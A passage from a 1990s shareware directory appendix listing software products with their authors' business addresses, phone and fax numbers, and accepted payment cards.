MasterCard, Visa + Fax: 606-832-2493 + Queries: 606-832-2493 + + Products: BATTLE CHARGE, COLOR CROSS + Author: Cold Water Software [Gene Brown] + Address: P.O. Box 44421, Eden Prairie, MN 55344-1421 + Orders & queries: 612-906-0955 + + Product: MotelMAX + Author: MKM Software + Address: 2812 Ingrid Lane, Metairie, LA 70003 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 504-885-7470 + + Appendix A, "Author addresses" 669 + + + + Product: RPMSHARE + Author: South Pointe Software + Address: 816 Peace Portal Drive, Suite 175, P.O. Box 880, + Blaine, WA 98231-0880 + Orders: 800-661-4480 (orders only, please) + Accepts: MasterCard, Visa + Fax: 604-538-3973 + Queries: 604-538-2326 + + Products: PMFLCOMP, RexxBase + Author: American Coders, LTD. [Joseph R. McVerry] + Address: POB 97462, Raleigh, NC 27624 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 919-846-2014 + + Product: FONEFILE + Author: Business Enhancement Partnership Group + Address: 3410 F. La Sierra Ave., Suite #181, Riverside, CA + 92503 + Queries: 909-354-5251 + + Products: ES-NEWS, ES-NMB, x-CAL3, x-CON3, x-FILE3, x-FONE3, x- + FONE4, x-FORUM3, x-FORUM4, x-NEWS3, x-OUT3, x-OUT4, x-SKED3 + Author: Extensions Software Corporation + Address: 1970 Osceola Parkway #350, Kissimmee, FL 34743 + Orders & queries: 407-344-3322 + Accepts: American Express, MasterCard, Optima, Visa + Fax: 407-344-3323 + + Product: C-Menu/32 + Author: C-Vision [Mark J. Finocchio] + Address: 5866 Via Cuesta Dr., El Paso, TX 79912-6608 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 915-833-6778 + + Products: Family Calendar for Windows, QIC-BAT for CMS + Author: Command Line Software [Douglas East] + Address: 3431 Florida Dr., Loveland, CO 80538 + Orders & queries: 970-667-4566 + Accepts: Discover, MasterCard, Visa + + Product: XFile + Author: Phase 33 Digital, Inc. + Address: 1346 Remsen Rd., Medina, OH 44256 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Appendix A, "Author addresses" 670 + + + + Products: Home Refinancing, HOME/OFFICE INVENTORY, ProAct + Contact Management + Author: ProDomus, Inc. [Philip S. Will] + Address: 16 Owen Street, Hartford, CT 06105 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 203-236-7954 + Queries: 203-233-0705 + + Product: Bigsort + Author: MeadowBrook Industries, Ltd. + Address: 450 Veterans Drive, Burlington, NJ 08016 + + Product: ViDir/ViRes File Monitor System + Author: Vahnzinn international + Address: 412 Norristown Road, Ambler, PA 19002-2737 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 215-643-6901 + + Product: Grafer Line Graphs for Reports + Author: Lovell's [Robert W. Lovell] + Address: 109 Amanda Drive, Anderson, SC 29621-2406 + Orders & queries: 803-224-2474 + + Product: You're Hired! + Author: DataWell + Address: 13712 James Avenue South, Burnsville, MN 55337-4340 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 612-894-7088 + + Products: Around The House, Car Restoration Diary, Computer + System Manager, JailBird, Jason's File Finder, MusicEase, + Office Supplies Tracker, Paper Route Ledger, Shareware Tracker + Author: RMH Computer Services [Richard Holler] + Address: PO Box 657, Beech Grove, IN 46107-0657 + Orders & queries: 317-782-9903 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 317-784-2147 + + Product: SAB Diskette Utility + Author: Stewart A. Berman [Stewart Berman] + Address: 34 Adler Place, Suite B, Bronx, NY 10475-3901 + + Appendix A, "Author addresses" 671 + + + + Products: Alarm VBX, BarCod VBX, BmpLst VBX, DFInfo VBX, FMDrop + VBX, IniCon VBX, JoyStk VBX, MenuEv VBX, MS Mega Pack (VBXes), + MSlot VBX, PerCnt VBX, Probe VBX, RoText VBX, SoundX VBX, + ZipInf VBX + Author: Mabry Software [James Shields] + Address: P.O. Box 31926, Seattle, WA 98103-1926 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 206-632-0272 + Queries: 206-634-1443 + + Product: C xref + Author: DA Software + Address: 3717 Aldon Lane, Flint, MI 48506 + Orders: 800-444-5457 (orders only, please) + Accepts: MasterCard, Visa + Queries: 313-736-0239 + + Product: Financial Analysis For Windows + Author: Gjetaas, Inc. [Russell C. Anderson] + Address: 7251 Mt. Baker Hwy, Deming, WA 98244 + Orders & queries: 360-599-2418 + Accepts: MasterCard, Visa + Fax: 360-599-1089 + + Product: WhizNotes + Author: Advanced Supprt Group, Inc. [Sanjay Kanade] + Address: 11900 Grant Place, Des Peres, MO 63131-4512 + Orders: 800-788-0787 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 314-966-1833 + Queries: 314-965-5630 + + Products: HangWin, OpenHome + Author: Temprano Software + Address: 32 Leonardo Drive, Clifton Park, NY 12065-2038 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: MAGIC SQUARES + Author: Randy A. Harris + Address: Box #265 1336, North Moorpark Road, Thousand Oaks, CA + 91360 + + Product: THE MAGIC OF THE MIND + Author: Donald E.J. Field + Address: PO Box 11, Port Elliot, 5212 S Aust AUSTRALIA + + Appendix A, "Author addresses" 672 + + + + Product: WinSecure + Author: ViewPoint Software, Inc. + Address: 20503 Yorba Linda Blvd., Ste 554, Yorba Linda, CA + 92686 + Orders & queries: 714-777-8362 + + Products: Rev. Lowell's Treasury of Humor, SmilerShell + Author: Bardon Data Systems + Address: 1023 Key Route Blvd., Albany, CA 94706-2321 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Fax: 415-572-0620 + Queries: 510-526-8470 + + Products: Easy Backup, Easy Base, Easy Install, Easy Menu, Easy + Word, J.T.S. TIME SHEETS + Author: Easy Software [John Turnbull] + Address: 3 Brookside Court, Prestbury Road, Macclesfield, SK10 + 3BR UNITED KINGDOM + Orders & queries: 01625-614669 + Fax: 01625-614669 + + Product: Book-It + Author: Instinctive Systems Ltd + Address: 12 Alton Towers, 180 Withington Road, Manchester M16 + 8WA ENGLAND + Orders & queries: +44(0)161-861-0043 + Accepts: MasterCard, Visa + Fax: +44(0)161-861-0043 + + Product: Universal Install + Author: The GoodSoft Co. + th + Address: 1630 30 Street, Suite 235, Boulder, CO 80301 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 303-444-0977 + Queries: 303-444-5747 + + Product: SuperFlow + Author: Advanced Technology Group, Inc. [Herbert Chow] + th + Address: 1139 W. 25 Street, Chicago, IL 60608 + Orders & queries: 312-225-8133 + Fax: 312-225-8406 + + Products: DeskTop Advisor(R), LegRoom, MultiVu + Author: Ivden Technologies, Inc. + Address: 87 Arbor Road, Churchville, PA 18966-1007 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 610-328-1145 + Queries: 610-328-1145 + + Appendix A, "Author addresses" 673 + + + + Products: Data Wire Four, dMAIL4, dVERSION, Hard Wire Four, SAC + DATABASE, Shell, Sub-contracor Billing, Version Control & + Maintenance + Author: C & R Business Systems Ltd. [Dennis Allen] + Address: P.O. Box 8227, Grand Rapids, MI 49518-8227 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 616-281-9075 + Queries: 616-281-3333 + + Products: VMS40 - EMS emulator (disk), Word Fugue, ZIP Fugue + (DOS) for PKZIP/UNZIP, ZIP Fugue (Windows) + Author: Fugue Software + Address: P.O. Box 425, Capalaba, QLD 4157 AUSTRALIA + Orders & queries: +61-7-824-2843 + Accepts: MasterCard, Visa + Fax: +61-7-824-2843 + + Products: The Complete Image, The Complete Morph + Author: Hot Wax Software [Paul D. Nettle] + Address: 7054 Foxthorn Dr., Canton, MI 48187-3073 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 313-941-9223 + + Products: Bridge Assistant, WinOCR + Author: SoftTech + Address: 24 Rosenthal Road, London, SE6 2BY UNITED KINGDOM + Orders & queries: 071-359-0405 + Fax: 071-539-0444 + + Products: FootPrint, QuickDir + Author: SUPERWARE [Jim Olsen] + Address: PO Box 1291, Naugatuck, CT 06770 + Orders: 800-847-0309 (orders only, please) + Accepts: MasterCard, Visa + Fax: 203-723-0014 + Queries: 203-723-0014 + + Product: DATA PROTECTOR + Author: PIGAS INC. + Address: 459 Columbus Ave. #314, New York, NY 10024 + Orders: 800-2424-PSL (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: ChronoLog + Author: ComputerEase [Doug Patrick] + Address: 7204 John Elizabeth Place, Prince George, VA 23875 + Orders: 800-242-4775 (orders only, please) + Accepts: + Queries: 804-458-2212 + + Appendix A, "Author addresses" 674 + + + + Product: Simstat + Author: Provalis Research [Normand Pe'ladeau] + Address: 5000 Adam Street, Montreal, PQ, H1V 1W5 CANADA + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 514-899-1672 + + Product: Golf Tournament Scorekeeper + Author: Home Alone Software + Address: 9630 100 Street, Edmonton, AB, T5K 0T6 CANADA + Orders: 800-995-1605 (orders only, please) + Accepts: MasterCard, Visa + Fax: 403-425-4404 + Queries: 403-425-4404 + + Products: TommySoftware CAD/DRAW, TommySoftware CAD/DRAW 4 + Level1, TommySoftware Tek Illustrator + Author: TommySoftware, N.A., Inc. + Address: 130 Barrow Street, New York, NY 10014 + Orders: 800-275-9406 (orders only, please) + Accepts: MasterCard, Visa + Fax: 212-807-8149 + Queries: 212-807-9720 + + Product: SkyMap + Author: Christopher A. Marriott + Address: 9 Severn Road, Culcheth, Cheshire WA3 5ED, UNITED + KINGDOM + Orders: 800-622-2793 (orders only, please) + Accepts: MasterCard, Visa + Fax: 612-322-5871 + Queries: 612-322-5868 + + Products: HANG4.ZIP, PHRASE.ZIP + Author: Larry W Parker + Address: 2049 Bunch Way, Carson, NV 89706 + + Appendix A, "Author addresses" 675 + + + + Products: The DemoMaker, Tag Line Xpress, UltiMenu + Author: Ron Janorkar + Address: 22 Prince Street, New York, NY 10012 + Orders & queries: 212-334-1243 + Fax: 212-334-1245 + + Products: ACZAR for DOS, ACZAR for Windows, CzarInstall for + DOS, CzarList for VBDOS + Author: CZAR Software [Thomas Jaeger] + Address: P.O. Box 370087, El Paso, TX 79937-0087 + Orders & queries: 915-595-8787 + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 915-595-0721 + + Product: Timeclock I + Author: Faught Data Systems, Inc. + Address: P.O. Box 361927, Milpitas, CA 95035 + Orders & queries: 800-394-4839 + Accepts: + Fax: 408-263-2741 + + Products: Double Directory, Have You Read That Movie?, NFL + Forecaster for DOS, NFL Forecaster for Windows + Author: 100% Cotton Software + Address: RR 1 Box 1622, Hop Bottom, PA 18824 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 717-289-4019 + + Product: LinguaPro/SPANISH + Author: Schulenberg and Associates, Inc. [Craig W. Schulenberg] + Address: P.O. Box 1005, Houston, TX 77251-1005 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-524-6398 + Queries: 713-440-4444 + + Appendix A, "Author addresses" 676 + + + + Product: 2DO Personal Task Manager + Author: William Anderson Consulting + st + Address: 13020 N. E. 71 Court, Kirkland, WA 98033 + Orders & queries: 206-828-3675 + + Products: The Deer Expert, The Fish Expert, Program for a Small + Planet + Author: Strat-Tech, Inc. + Address: P.O. Box 1957, Milwaukee, WI 53201 + Orders & queries: 800-783-9544 + Accepts: American Express, MasterCard, Optima, Visa + + Product: Drag and Drop Printing + Author: FLFSoft Inc. + Address: P.O. Box 306, Oak Creek, WI 53154-0306 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Products: File Maven, Puffer + Author: Kent Briggs + Address: 109A Romana Circle, Hewitt, TX 76643 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Product: Builder + Author: Aeolus Software + Address: P.O. Box 11915, St. Paul, MN 55119-0915 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 715-386-4182 + Queries: 612-730-4135 + + Products: Personal Schedule, Variable Investment Analyst + Author: Will Baldwin + Address: 8704 Broadmoor #806, Overland Park, KS 66212 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 913-381-9109 + Queries: 913-381-9109 + + Appendix A, "Author addresses" 677 + + + + Product: MAZEMAKER for Windows + Author: Custom Real-Time Software, Inc. (CRTS) + Address: P.O. Box 1106, West Caldwell, NJ 07007 + Orders & queries: 201-228-7623 + Fax: 201-228-7623 + + Products: clySmic Icon Bar, clySmic Lunar Almanack, Drag 'n' + Drop Utils for Win NT, Papers, VPT + Author: clySmic Software + Address: PO Box 2421, Empire State Plaza, Albany, NY 12220 + Orders: 800-2424-PSL (orders only, please) + Accepts: + Fax: 518-458-7476 + Queries: 518-438-5548 + + Product: FSLOGIN + Author: Confirm + Address: Ardechelaan 35, 6904 NG Zevenaar, THE NETHERLANDS + Orders: +31-8360-24988 (orders only, please) + Fax: +31-8360-41580 + st + Products: 1 &goal Fantasy Football, FastBreak Fantasy + Basketball, Keyboard Coach Fantasy Football, LineDrive Fantasy + Baseball + Author: McS Custom Software + Address: PO Box 1032, Fortuna, CA 95540 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 707-725-6016 + + Products: TextPad 16, TextPad 32 + Author: Helios Software Solutions + Address: Carr Brook Hse, Chorley Old Rd, Brindle, Chorley PR6 + 7QZ ENGLAND + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Products: THE FEELING'S MUTUAL-DOS, THE FEELING'S MUTUAL- + Macintosh, THE FEELING'S MUTUAL-WINDOWS + Author: Interpretive Software Inc. [Stu James] + Address: 1932 Arlington Blvd, Suites 107-109, Charlottesville, + VA 22903 + Orders: 800-746-8587 (orders only, please) + Accepts: MasterCard, Visa + Fax: 804-979-2454 + Queries: 804-979-0245 + + Product: Above & Beyond + Author: 1Soft Corp. + Address: PO Box 1320, Middletown, CA 95461 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 707-987-3150 + Queries: 707-987-0256 + + Appendix A, "Author addresses" 678 + + + + Product: QRead + Author: DS Products [Daniel Scavezze] + Address: P.O. Box 342, Westford, MA 01886 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, MasterCard, Optima, Visa + Queries: 508-250-1351 + + Products: DDKEY, XMENU + Author: David M. Dibble + Address: 5388 Dahlia Lane, Riverside, CA 92507 + + Products: Clickometer, A Project/Event Planner + Author: Sapphire Software Inc. + Address: 6650 Hawaii Kai Drive, Suite 219, Honolulu, HI 96825 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 808-395-5587 + + Products: PROP OPTIMIZER (tm), QuickTax (tm) Planner/Estimator + Author: Bates Engineering/Software + Address: 2742 Swansboro Road, Placerville, CA 95667 + Orders & queries: 916-622-1886 + Fax: 916-622-1886 + + Product: HortMan + Author: Sunrise Software + Address: 4821 Clydelle Ave., San Jose, CA 95124 + Queries: 408-377-0703 + + Product: Track-It + Author: Millennium Software + Address: PO Box 2209, Dublin, CA 94568 + Orders & queries: 510-828-5892 + Accepts: MasterCard, Visa + + Product: Judy's TenKey + Author: Judy's Applications [Daniel E. Stickel] + Address: 2464 El Camino Real, Suite #125, Santa Clara, CA + 95051 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 408-244-0744 + + Products: OWShare - Delphi, OWShare - VB, WinFlash, WinJottr, + WinKillr, WinPrice, WinUpD8R + Author: Open Windows [Richard W. Bryant] + Address: PO Box 49746, Colorado Springs, CO 80949-9746 + Orders: 800-531-0403 (orders only, please) + Accepts: MasterCard, Visa + Fax: 800-531-0403 + Queries: 719-531-0403 + + Appendix A, "Author addresses" 679 + + + + Products: Bookbild/DOS Pamphlet Publisher, Bookbild/Win + Pamphlet Publisher, Graphcat/DOS Clip Art Cataloger, Graphcat/ + Win Clip Art Cataloger, The Letterhead Kit/DOS, The Letterhead + Kit/Win + Author: Science Translations Software Services [Jerry Stern] + Address: PO Box 20234, Baltimore, MD 21284-0234 + Orders & queries: 410-661-2224 + Accepts: American Express, MasterCard, Optima, Visa + Fax: 410-661-2224 + + Products: PC-Proof, WinProof + Author: Intellect Systems + Address: P.O. Box 58213, Renton, WA 98058 + Orders & queries: 206-226-0429 + + Product: From Scratch recipe processor + Author: Desktop Solutions [Frank Imburgio] + Address: 26 Cecily Lane, Commack, NY 11725 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 516-493-3422 + Queries: 516-493-3422 + + Products: RagTime for Windows, VB-Dial + Author: Unique Software Productions + Address: Box 1337, Bellflower, CA 90706 + Orders & queries: 310-866-1932 + + Product: Portfolio Manager + Author: Shane Software International [Steven C. Hane] + th + Address: 107 17 Court, Sequim, WA 98382-9350 + Orders: 800-742-6303 (orders only, please) + Accepts: MasterCard, Visa + Queries: 360-681-2402 + + Product: Grocery Manager for Windows + Author: Absolute Value Software + Address: 4325 SW Stoddard Dr., Aloha, OR 97007 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Appendix A, "Author addresses" 680 + + + + Product: Hebrew Edit + Author: Right to Left Software + Address: 3332 Yonge Street, #94034, Toronto Ont. M4N-3R1 + CANADA + Orders & queries: 416-489-7440 + Fax: 416-489-6654 + + Product: Fixed Asset Pro + Author: HammerSoft, Inc. + Address: P.O. Box 205, Kansas, OH 44841 + Orders & queries: 419-986-6007 + Accepts: MasterCard, Visa + Fax: 419-986-6007 + + Products: TC's Personal Data Manager, TC's Toolbox, TMC + Calendar & Phone Book + Author: Specific Applications Software [Timothy W. Carlson] + Address: P.O. Box 6146, Minneapolis, MN 55406-0146 + Orders: 800-242-4775 (orders only, please) + Queries: 612-722-9659 + + Product: DR. FORM + Author: IrwinWare [Russ Irwin] + Address: 113 Beechmont Ave., Pittsburgh, PA 15229 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 412-931-8442 + Queries: 412-931-9577 + + Products: THE CALLING TREE, PUBLIC ACCESS(tm) + Author: IN/QUEST, LLC [Jim Turner] + Address: 3140 South Peoria St, K-200, Aurora, CO 80014-3155 + Orders & queries: 303-671-0800 + Accepts: MasterCard, Visa + Fax: 303-688-0188 + + Product: Bingo Text Editor + Author: Sunderland Software + Address: PO Box 2563, Columbia, MD 21045 + Orders & queries: 410-379-9019 + Accepts: MasterCard, Visa + + Products: DizView, FileMod, First Impression, Palette Adjuster, + Vending Machine + Author: Lincoln Beach Software [Harold Holmes] + Address: PO Box 1554, Ballwin, MO 63022-1554 + Orders: 800-242-4775 (orders only, please) + Accepts: MasterCard, Visa + Fax: 314-861-1500 + Queries: 314-861-1500 + + Appendix A, "Author addresses" 681 + + + + Product: Home Plan + Author: Home Plan [Chuck Herndon] + Address: 6890 Rimrock Valley Rd., Mountain Ranch, CA 95246 + Orders: 800-671-7526 (orders only, please) + Accepts: MasterCard, Visa + Fax: 209-754-3737 + Queries: 209-754-4891 + + Products: DOC DEFIANT, MATH CHALLENGE + Author: Just For Me Software, Inc. + Address: P.O. Box 531, Novi, MI 48376 + Queries: 810-348-6697 + + Product: BCM Menu System + Author: BCM Software [Brad May] + Address: P.O.Box 267, Taylor, MI 48180-0267 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 313-292-6097 + + Products: ESPTEST, KAPIAN : Chinese Flash Cards + Author: Selfhelp Software [Phil Mosier] + Address: 2728 Bridgeford Drive, Sacramento, CA 95833 + Orders & queries: 916-927-2602 + + Products: Thelma ThistleBlossom, Thelma's ClichePlus, Thelma's + SpellPlus + Author: Timpanogos Software [Douglas Campbell] + Address: 758 East 100 North, Orem, UT 84057-4910 + Orders & queries: 801-223-9055 + Accepts: MasterCard, Visa + Fax: 801-225-5212 + + Product: XYSee + Author: Insight Advantage + Address: 4509 Yellowleaf Dr., Fort Worth, TX 76133 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 817-346-9116 + + Products: DBKIT, Hands On Remote Control/Access, Open Menu, + Teleshare/DOS Remote Access + Author: P. C. Softsmith [Vic Williams] + Address: 606 6455 Willingdon Ave, Burnaby, BC, V5H 4E4 CANADA + Orders & queries: 604-433-5189 + + Product: CODE-A-LINE + Author: Optimax Corporation + Address: P.O. Box 25447, Chicago, IL 60625-9998 + Fax: 312-561-6363 + Queries: 312-561-6363 + + Appendix A, "Author addresses" 682 + + + + Product: QBALL + Author: Benjamin W. Hartley + Address: Forest Park Estates #103, Jaffrey, NH 03452 + + Products: c-scope, FileSafe, JRchive, PC-Fortune + Author: JAYAR Systems + Address: 253 College Street, Suite 263, Toronto, Ontario, + CANADA M5T 1R5 + Accepts: MasterCard, Visa + Queries: 416-751-5678 + + Product: DiskMan for Windows + Author: Diskmaster Software + Address: 8506 Timber Hill Court, Ellicott City, MD 21043 + Orders: 800-242-4775 (orders only, please) + Accepts: MasterCard, Visa + Queries: 410-418-8825 + + Products: MathCounts 1+2, MathCounts 3+4, O.R.B.Y. + Author: Able Art Software [Al Walters] + Address: P.O. Box 964, Nelson, B.C. V1L 6A5 CANADA + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 604-229-4766 + + Product: EnVision Publisher + Author: Software Vision Corporation + Address: P.O. Box 1734, Pinellas Park, FL 34664-1734 + Orders: 800-388-8474 (orders only, please) + Queries: 813-545-4354 + + Products: ComeBack, GetBack, SpeedBack + Author: MicroTools Inc [Robert J. Japenga] + Address: 714 Hopmeadow St, Suite 14, PO Box 624, Simsbury, CT + 06070 + Orders & queries: 203-651-6170 + Accepts: MasterCard, Visa + Fax: 203-651-0019 + + Product: Code.Print for Visual Basic + Author: Caladonia Systems, inc. + Address: PO Box 1954, Tacoma, WA 98401-1954 + Orders: 206-729-2325 (orders only, please) + Accepts: MasterCard, Visa + Fax: 206-759-2342 + Queries: 206-759-2325 + + Appendix A, "Author addresses" 683 + + + + Products: MEGA EDIT Editor for Windows, WinNET Mail for MS + Windows + Author: COMPUTER WITCHCRAFT, INC. + Address: 330F Distillery Commons, Louisville, KY 40206 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 502-589-7300 + Queries: 502-589-6800 + + Products: BASASM.LIB, QENV + Author: Annette Cuomo + Address: 3751 Durango St., Chino, CA 91710 + Orders & queries: 909-591-4956 + + Product: SCBA Trak + Author: Raymond A.J. Pesek + Address: 4706 Cottonwood Lane, Brunswick, OH 44212-2412 + Queries: 216-225-0248 + + Product: BIBLOGIC + Author: Biblogic Computer Services [Steve Champion] + Address: PO Box 1424, Thousand Oaks, CA 91358-0424 + Fax: 805-493-0364 + + Products: Fishtime, Golfhcap, Marnav + Author: C & E Associates [Edward J. Panner] + Address: 119 Placid Drive, Fort Myers, FL 33919 + Orders: 941-482-5863 (orders only, please) + + Product: ToolBOX + Author: The Binary Toolshed [Roy Anderson] + Address: 388 Deerview Drive SE, Calgary, Alberta T2J 5Y2 + CANADA + Orders & queries: 403-225-2663 + Accepts: MasterCard, Visa + Fax: 403-271-5732 + + Products: SMALL BUSINESS ADVISOR, WALL STREET RAIDER + Author: RONIN Software + Address: 3020 Issaquah-Pine Lake Rd. S.E., Suite #36, Issaquah, + WA 98027-7255 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 206-391-4036 + + Appendix A, "Author addresses" 684 + + + + Products: INVENTORY & COST CONTROL, RECIPE FILE MANAGEMENT, + RESTAURANT COST CONTROL + Author: First Step Software [Larry Larsen] + Address: 4839 Burlington, Boise, ID 83704 + Orders & queries: 208-376-4411 + Accepts: MasterCard, Visa + Fax: 208-376-4411 + + Products: DATA MASTER, LABEL MASTER, TASK MASTER + Author: RKS Software, Inc. [Robert K. Summers] + Address: 3820 N. Dittmar Road, Arlington, VA 22207-4565 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 703-534-4358 + Queries: 703-534-1726 + + Products: Crush, PocketD Plus + Author: PocketWare [Jeff Rollason] + Address: Box 2369, Hendon, London, NW4 1NR ENGLAND + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 713-524-6398 + Queries: +44-81-203-3731 + + Products: CUSTOM SCREEN SAVER (WINDOWS), ULTIMATE BACCARAT, + ULTIMATE BLACKJACK, ULTIMATE GIN + Author: Accidental Software + Address: 13245 Skiomah Rd., Apple Valley, CA 92308 + Orders & queries: 619-247-2804 + Accepts: American Express, Discover, MasterCard, Optima, Visa + + Products: CircumSpace, SkyGlobe + Author: KlassM Software, Inc. + Address: PO BOX 1067, Ann Arbor, MI 48106 + Orders: 800-968-4994 (orders only, please) + Accepts: MasterCard, Visa + Fax: 313-426-5533 + + Product: Vehicle Costs + Author: Graham Ferguson + Address: 3 Cristata Ave, Endeavour Hills, Vic. 3802 AUSTRALIA + Orders & queries: +61-3-700-3764 + + Products: BUDDY: A Tutorial Companion, LEADING AND MANAGING + OTHERS, PoeTrio, POETRY STAR, SNAKE + Author: Chatfield Software, Inc. [Hale Chatfield] + Address: P.O. Box 115, Hiram, OH 44234-0115 + Orders: 800-645-8806 (orders only, please) + Accepts: MasterCard, Visa + Fax: 216-569-5449 + Queries: 216-632-5447 + + Appendix A, "Author addresses" 685 + + + + Product: GradeBook for Windows + Author: R&R EdWare [Russell Stevens] + Address: 5191 Pine Grove Dr., Spruce, MI 48762 + Orders: 800-727-2065 (orders only, please) + Accepts: MasterCard, Visa + Queries: 517-727-2066 + + Product: Snooper + Author: Vias and Associates + Address: PO Box 470805, San Francisco, CA 94147-0805 + Orders: 800-332-8234 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 415-922-3197 + Queries: 415-921-6262 + + Product: 4FILES + Author: Hand-Crafted Software [Larry T. Edwards] + Address: Box 6001, Sitka, AK 99835 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 907-747-4801 + Queries: 907-747-8996 + + Products: EZSET, Textshot + Author: McAdams Associates [Craig McAdams] + Address: P.O. Box 835505, Richardson, TX 75083-5505 + Queries: 214-239-9646 + + Products: BTS-Equalizer, TRAINER + Author: Nine-Patch Software [Richard A. Hart, PhD] + Address: 315 South Alco Avenue, Maryville, MO 64468-2033 + Orders & queries: 816-582-8589 + + Products: DJ-CHECK, DJ-LOPE, DJ-SLEEVE, LJ-SLEEVE, PS-SLEEVE + Author: JMJ Software + Address: 5000 Valley Stream Road, Charlotte, NC 28209 + Orders & queries: 704-525-1472 + + Products: DaMenu, NeMenu + Author: Just-In-Time Computing Services [John C. Skurka] + Address: P.O. Box 4166 + Orders & queries: 607-539-6609 + Accepts: + Fax: 607-539-6609 + + Product: Super Stuff Utilities + Author: Super Tools [Joseph A. Herrera] + Address: P.O. Box 866125, Plano, TX 75086-6125 + Queries: 817-382-7585 + + Appendix A, "Author addresses" 686 + + + + Product: CALC_JNC + Author: James N. Cox + Address: 418 Erie Avenue, Quakertown, PA 18951-1309 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Queries: 215-538-7363 + + Product: GammaCAD PRO + Author: Gamma Software + Address: PO Box 8191, Fort Collins, CO 80526 + Orders: 800-747-9960 (orders only, please) + Accepts: MasterCard, Visa + Fax: 970-490-2928 + Queries: 970-490-2928 + + Products: Cumberland Diary, Cumberland Family Tree, Cumberland + Story + Author: Cumberland Family Software [Ira J. Lund] + Address: 385 Idaho Springs Road, Clarksville, TN 37043 + Orders & queries: 615-647-4012 + Accepts: MasterCard, Visa + + Products: Public Address, RideMatch + Author: Paradise Programming [Chris M. Davies] + th + Address: 3805 85 Ave N.W., Olympia, WA 98502 + Queries: 206-866-3781 + + Products: HOLD-ANYTHING!, NAMEBASE + Author: Elk Creek Software [Michael J. Paulick] + Address: PO Box 935, Conifer, CO 80433-0935 + Orders: 800-242-4775 (orders only, please) + + Product: Tolman Dental Program + Author: Peter T. Smith D.D.S. + Address: 455 Neighborhood Rd. + Orders & queries: 516-281-5544 + + Product: PrintEnvelope + Author: Maurer Associates [T. Scott Maurer] + Address: 7324 Native Oak Drive, Irving, TX 75063-8405 + Orders: 800-242-4775 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 214-506-0670 + Queries: 214-432-0700 + + Products: ABcmd, ABmenu, ATTRB, FDplot, HandyDOS + Author: Abri Technologies, Inc. + Address: HC 62, Box 100K, Great Cacapon, WV 25422 + Orders: 304-947-7129 (orders only, please) + Accepts: American Express, Discover, MasterCard, Optima, Visa + Fax: 304-947-7628 + + Appendix A, "Author addresses" 687 + + + + Products: Crossdown, Crossdown for Windows, Enigmacross + 